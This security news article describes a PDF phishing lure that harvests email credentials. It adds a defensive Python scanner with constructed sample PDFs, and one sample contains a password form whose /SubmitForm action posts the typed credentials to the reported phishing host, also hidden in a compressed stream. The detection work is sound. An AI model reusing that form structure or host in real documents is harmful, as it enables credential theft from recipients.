Late last week the SANS Internet Storm Center published a warning concerning a new and active phishing scam that uses PDF attachments in an attempt to gather user email credentials. The bulletin, which was published initially on the SANS website, includes screenshots of the PDF attachment that was reported to them.
The lure asks the recipient to open the attached PDF, titled “Assessment Document”, and to enter their own email address and password to “unlock” it. Once the details are submitted, the PDF tries to open a malicious website that records the credentials; with a working mailbox login the attacker can then gain a foothold in your organisation and move on to any linked accounts or computers on the network.
The URL the PDF tries to open was originally reported as http://chai.myjino.ru. The body of the email itself also includes the message, “PDF Secure File UNLOCK to Access File Content.”
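A PDF that behaves this way carries an action object (a /SubmitForm or /URI action attached to a form button) that fires when the victim presses “unlock”. The scanner below is an added example for this article, not code from the SANS ISC diary or from the reported sample: it pulls action types and external URLs out of a PDF's raw bytes, inflates FlateDecode streams so that object streams are covered, and flags the combination the diary describes, a password-style form field together with an outbound URL. The sample PDFs are constructed for the example; the URL is the one reported above, but the form layout, object numbering and the heuristic itself are assumptions, not a description of the real attachment.

```python
"""Triage a PDF attachment for actions that send the reader to an external site.

Added example for this article; not code from the SANS ISC diary. It works on
raw bytes with regular expressions, so it needs no PDF library, but it is a
triage heuristic, not a full PDF parser.
"""
import re
import zlib

# Action types of interest. /SubmitForm is the one a credential-harvesting
# form needs: it POSTs the field values (the typed email and password) to /F.
ACTION_RE = re.compile(rb"/S\s*(/URI|/SubmitForm|/Launch|/JavaScript)\b")
# String-form destinations: /URI (http://...) for URI actions, /F (http://...)
# for SubmitForm. /F may also be a file-specification dictionary; not handled here.
URL_RE = re.compile(rb"/(?:URI|F)\s*\((https?://[^)]*)\)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
FF_RE = re.compile(rb"/Ff\s*(\d+)")
FIELD_NAME_RE = re.compile(rb"/T\s*\(([^)]*)\)")
PASSWORD_FLAG = 1 << 13  # text-field flag bit 14: the reader masks typed characters


def inflate_streams(data: bytes) -> bytes:
    """Return the concatenated contents of every stream that inflates cleanly."""
    chunks = []
    for m in STREAM_RE.finditer(data):
        try:
            chunks.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # image data, another filter, or not compressed at all
    return b"".join(chunks)


def has_password_field(text: bytes) -> bool:
    """True if any form field is flagged as a password field or is named like one."""
    if any(int(m.group(1)) & PASSWORD_FLAG for m in FF_RE.finditer(text)):
        return True
    return any(b"password" in m.group(1).lower() for m in FIELD_NAME_RE.finditer(text))


def scan_pdf(data: bytes) -> dict:
    """Collect action types, external URLs and form hints from raw PDF bytes."""
    text = data + inflate_streams(data)
    return {
        "actions": sorted({m.group(1).decode("latin-1") for m in ACTION_RE.finditer(text)}),
        "urls": sorted({m.group(1).decode("latin-1") for m in URL_RE.finditer(text)}),
        "password_field": has_password_field(text),
        # Strings in an encrypted PDF are ciphertext, so an empty result proves nothing.
        "encrypted": b"/Encrypt" in text,
    }


def looks_like_credential_lure(report: dict) -> bool:
    """The diary's pattern: a password-style field plus a way to ship it off-host."""
    return report["password_field"] and bool(report["urls"])


# Constructed sample: a form with email/password widgets whose "unlock" button
# submits the fields to the reported host, plus a plain URI action to it.
SAMPLE_PHISH_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /AcroForm << /Fields [5 0 R 6 0 R] >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [5 0 R 6 0 R 7 0 R] >> endobj
5 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (email) /Rect [50 600 300 620] >> endobj
6 0 obj << /Type /Annot /Subtype /Widget /FT /Tx /T (password) /Ff 8192 /Rect [50 570 300 590] >> endobj
7 0 obj << /Type /Annot /Subtype /Widget /FT /Btn /T (unlock) /Rect [50 530 150 550]
   /A << /S /SubmitForm /F (http://chai.myjino.ru) /Flags 4 >> >> endobj
8 0 obj << /Type /Action /S /URI /URI (http://chai.myjino.ru) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: a document whose only action is internal navigation.
SAMPLE_BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 10 10] /A << /S /GoTo /D [3 0 R /Fit] >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed sample: the same URI action hidden inside a FlateDecode object stream,
# which a plain `strings`-style look at the file would miss.
_HIDDEN = b"8 0 obj << /Type /Action /S /URI /URI (http://chai.myjino.ru) >> endobj"
SAMPLE_COMPRESSED_PDF = (
    b"%PDF-1.5\n9 0 obj << /Type /ObjStm /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(_HIDDEN)
    + b"\nendstream\nendobj\n%%EOF\n"
)

if __name__ == "__main__":
    for name, blob in [("phish", SAMPLE_PHISH_PDF), ("benign", SAMPLE_BENIGN_PDF),
                       ("compressed", SAMPLE_COMPRESSED_PDF)]:
        rep = scan_pdf(blob)
        print(name, rep, "LURE" if looks_like_credential_lure(rep) else "ok")
```

The heuristic is deliberately narrow: an outbound /URI or /SubmitForm on its own is common in legitimate documents, so the verdict only fires when a password-style field is present as well. Two limits worth knowing before relying on it: an encrypted PDF hides its strings (the `encrypted` flag is the reminder), and a /SubmitForm whose /F is a file-specification dictionary rather than a plain string needs a real PDF parser.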
Prudent PDF and email users should always be vigilant when opening attachments from unknown sources. In this case the sender name was “VetMeds” and the sending domain belonged to a school, so at first glance the message could look trustworthy; yet the attachment presented itself as an invoice for a SWIFT transaction, which sits oddly with a school sender and should be a warning flag on its own. Make sure you are using an up-to-date PDF reader: mainstream readers prompt before following a URL embedded in a document, whether or not the form has been filled in, and that prompt is the moment to stop. Users of the Edge browser should be aware that it opens PDF files within the browser by default and, as reported, follows such links without asking for permission. A sensible default on Windows 10 is therefore to associate PDF files with a third-party reader rather than the browser.
Additionally, a genuinely password-protected PDF behaves quite differently. The reader itself prompts for the document password, which was set by the creator of the document, before any content is displayed; the prompt is a dialog belonging to the reader, not a form inside the page, and it never asks for an email address or an email password. A “lock” that asks for your own credentials is a phishing form, so there is no reason to fill in personal password details.